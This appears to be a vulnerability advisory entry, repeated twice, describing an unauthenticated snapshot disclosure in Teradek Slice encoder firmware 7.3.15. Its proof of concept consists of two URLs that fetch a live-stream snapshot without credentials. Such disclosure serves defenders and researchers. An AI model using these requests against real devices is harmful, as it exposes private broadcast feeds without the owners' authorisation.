VULHUB ™

### Summary Built on the award-winning Cube platform, Slice is a rack mount HEVC / H.264 codec designed to fit seamlessly into your broadcast studio. Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O, Ethernet and WiFi connectivity, and full duplex IFB. ### Description Slice suffers from an unauthenticated and unauthorized live stream disclosure when snapshot.cgi script is called. ### Vendor Teradek, LLC - https://www.teradek.com ### Affected Version * Firmware Version:7.3.15 (build 31735) * Hardware Version: 2.1 ### Tested On * lighttpd/1.4.48 * lighttpd/1.4.31 ### PoC ``` http://127.0.0.1:8089/cgi-bin/snapshot.cgi <-- Generate new and view (redirects to /snapshot.jpg) http://127.0.0.1:8089/snapshot.jpg <-- View stored ```

### Summary Built on the award-winning Cube platform, Slice is a rack mount HEVC / H.264 codec designed to fit seamlessly into your broadcast studio. Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O, Ethernet and WiFi connectivity, and full duplex IFB. ### Description Slice suffers from an unauthenticated and unauthorized live stream disclosure when snapshot.cgi script is called. ### Vendor Teradek, LLC - https://www.teradek.com ### Affected Version * Firmware Version:7.3.15 (build 31735) * Hardware Version: 2.1 ### Tested On * lighttpd/1.4.48 * lighttpd/1.4.31 ### PoC ``` http://127.0.0.1:8089/cgi-bin/snapshot.cgi <-- Generate new and view (redirects to /snapshot.jpg) http://127.0.0.1:8089/snapshot.jpg <-- View stored ```